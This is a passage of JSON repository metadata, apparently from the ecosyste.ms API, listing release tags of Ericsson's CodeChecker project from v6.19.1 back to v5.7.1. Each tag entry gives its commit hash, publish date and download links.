ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1/manifests"},{"name":"v6.19.0-hotfix1","sha":"e262d015068c6b49f92a2afb1a166eb4f4438e84","kind":"commit","published_at":"2022-03-12T13:05:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1/manifests"},{"name":"v6.19.0","sha":"5f5b6b7e7ecd70d23079580c063f4e4f2bb2a7ad","kind":"commit","published_at":"2022-03-10T13:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0/manifests"},{"name":"v6.18.2-hotfix1","sha":"359e88b9339946cba84c00ad32511be8b7fad65d","kind":"commit","published_at":"2022-02-03T09:31:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1/manifests"},{"name":"v6.18.2","sha":"992d274c78b9a0436328c30a40d3b1de899902e2","kind":"commit","published_at":"2022-01-14T14:04:31.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2/manifests"},{"name":"v6.18.1","sha":"fd5f7e04219f947cfda68e9e11f4d3b07f0564a5","kind":"commit","published_at":"2021-12-10T07:28:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1/manifests"},{"name":"v6.18.0-hotfix1","sha":"a46603ab87348ff5e9bf5016fd906e9ef6781eb4","kind":"commit","published_at":"2021-11-18T17:46:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1/manifests"},{"name":"v6.18.0","sha":"153b0e09efc715fd16eee815eecf454f9f79f7f1","kind":"commit","published_at":"2021-11-12T12:51:42.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0/manifests"},{"name":"v6.17.0-hotfix1","sha":"315d4494603b02252966770452e676fd63a67021","kind":"commit","published_at":"2021-10-14T12:22:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1/manifests"},{"name":"v6.17.0","sha":"d0e2d7ba5f62d722e907d1ce8af6dbb24ee34e5d","kind":"commit","published_at":"2021-09-10T14:05:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0/manifests"},{"name":"v6.16.0-hotfix1","sha":"dcb4c5c74697711e0b65bb88b1796aec34846649","kind":"commit","published_at":"2021-06-23T13:36:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1/manifests"},{"name":"v6.16.0","sha":"8880695af939838b2e1e16b018c51ed66c6a5366","kind":"commit","published_at":"2021-06-01T12:07:59.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0/manifests"},{"name":"v6.15.2","sha":"63740679d61ff715175b9f31858d2fe9767efa41","kind":"commit","published_at":"2021-04-06T13:47:08.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2/manifests"},{"name":"v6.15.1-hotfix1","sha":"55c53a71295e07ea9ae3370130e6495649e8760a","kind":"commit","published_at":"2021-03-10T10:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1/manifests"},{"name":"v6.15.1","sha":"692e51ba4be08e97c4b07cc344edca082dc50f63","kind":"commit","published_at":"2021-02-03T12:52:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1/manifests"},{"name":"v6.15.0-hotfix1","sha":"267e9cb77e55f77a457b3b1f2f3660f35564939e","kind":"commit","published_at":"2021-01-08T11:03:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1/manifests"},{"name":"v6.15.0","sha":"131861b7e94298f58cad883a533814573b89a0f3","kind":"commit","published_at":"2020-11-12T23:55:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0/manifests"},{"name":"v6.14.0","sha":"644f900e80e2053cdb7d69eee3dfa34e622c185c","kind":"commit","published_at":"2020-09-11T13:12:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.14.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0/manifests"},{"name":"v6.13.0","sha":"17678b103375a9dbff6e69328d0996d54de78ef3","kind":"commit","published_at":"2020-07-10T13:24:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.13.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0/manifests"},{"name":"v6.12.1","sha":"be4c6ac31f125be8432589ea9e9e5b1bbd838d22","kind":"commit","published_at":"2020-06-12T11:46:39.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1/manifests"},{"name":"v6.12.0","sha":"ecccb6308db0a16d80bb6273280d482576d28d8b","kind":"commit","published_at":"2020-05-14T17:59:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0/manifests"},{"name":"v6.11.1","sha":"9bb0047368707a18efaca3a207dc8227c8e19b9e","kind":"commit","published_at":"2020-02-12T23:12:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1/manifests"},{"name":"v6.11.0","sha":"65a042f1ad0dec5581d54cb13396d201a573c0b2","kind":"commit","published_at":"2019-12-12T16:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0/manifests"},{"name":"v6.10.1","sha":"d3928e30d25bd10da977d2d1119f300a30179cc0","kind":"commit","published_at":"2019-10-09T14:33:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1/manifests"},{"name":"v6.10.0","sha":"28cb13900c6e2ada55f469d267e05cab9844a97a","kind":"commit","published_at":"2019-07-11T18:00:44.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0/manifests"},{"name":"v6.9.1","sha":"197579e082c64e42043683b4e14ae2228a5c7d89","kind":"commit","published_at":"2019-04-11T13:22:48.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1/manifests"},{"name":"v6.9.0","sha":"03351d259b47a57d0c0daebf2a2b00149ea37298","kind":"commit","published_at":"2019-02-08T14:26:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0/manifests"},{"name":"v6.8.1","sha":"e8b4c6172b45428f997c0e7f37891e11ae312180","kind":"commit","published_at":"2018-11-08T10:10:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1/manifests"},{"name":"v6.8.0","sha":"2bd99a0b24b4b62fb85992f94ab682c4a9ddc362","kind":"commit","published_at":"2018-09-11T11:33:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0/manifests"},{"name":"v6.7.1","sha":"968bd5ae5f82fe2d5d329005a2e7748c1200d8fc","kind":"commit","published_at":"2018-06-08T09:08:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1/manifests"},{"name":"v6.7.0","sha":"9c4f1c514517af66c92e8b73332a79f2adf69e73","kind":"commit","published_at":"2018-05-16T11:22:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0/manifests"},{"name":"v6.6.0","sha":"d507de883bd29bdc8221e8ecb74c9d1117ad5867","kind":"commit","published_at":"2018-03-22T14:30:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0/manifests"},{"name":"v6.5.1","sha":"fd2df3820f3985e4b2e2b576d0cc9aa9c2474348","kind":"commit","published_at":"2018-02-22T16:01:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1/manifests"},{"name":"v6.5","sha":"7370d62dccac3c5ce2771764fa92b8e3bc22bbac","kind":"commit","published_at":"2018-02-07T12:01:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5/manifests"},{"name":"v6.4","sha":"32ea3cf57eb71255307c065ff8bac6513e0064b9","kind":"commit","published_at":"2018-01-11T14:04:15.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4/manifests"},{"name":"v6.3","sha":"44c2a7740fa27b9459c40daea2b7836b1c8ca250","kind":"commit","published_at":"2017-12-11T19:02:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3/manifests"},{"name":"v6.2.1","sha":"174807916c5df8cd80bb08d5f11ac6a49f9e91bf","kind":"commit","published_at":"2017-11-27T16:06:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1/manifests"},{"name":"v6.2","sha":"b5ef68f0049ce63a767d82ca602b470ad3f5e758","kind":"commit","published_at":"2017-11-15T16:54:58.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2/manifests"},{"name":"v6.1.1","sha":"64e128e075defb1e05002ecef481ca120d79fb84","kind":"commit","published_at":"2017-10-27T14:25:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1/manifests"},{"name":"v6.1","sha":"ab67d2626297da41ec42afa2cbb404538069db1f","kind":"commit","published_at":"2017-10-13T16:22:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1/manifests"},{"name":"v6.0.1","sha":"f7506fde033e6f57af6612847b447af69077ac8c","kind":"commit","published_at":"2017-10-02T09:28:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1/manifests"},{"name":"v6.0","sha":"666452b9ab4fc97438ac2c45166def3bd3269971","kind":"commit","published_at":"2017-09-18T22:19:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0/manifests"},{"name":"v5.10","sha":"927979c4eee9f53f5fec79fba3e1be7c606c599c","kind":"commit","published_at":"2017-08-09T18:31:55.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.10","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10/manifests"},{"name":"v5.9","sha":"ebb1d0330efa1da5712a01c92e0c004aba46bd05","kind":"commit","published_at":"2017-07-14T14:09:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.9","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9/manifests"},{"name":"v5.8","sha":"e8f7d02769a613286c1749d70495ba6a41f7427c","kind":"commit","published_at":"2017-07-07T12:32:03.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.8","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8/manifests"},{"name":"v5.7.1","sha":"2eca2df6a9d0f5482c1783f063568de5c1ddbe5d","kind":"commit","published_at":"2017-02-09T17:03:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Eri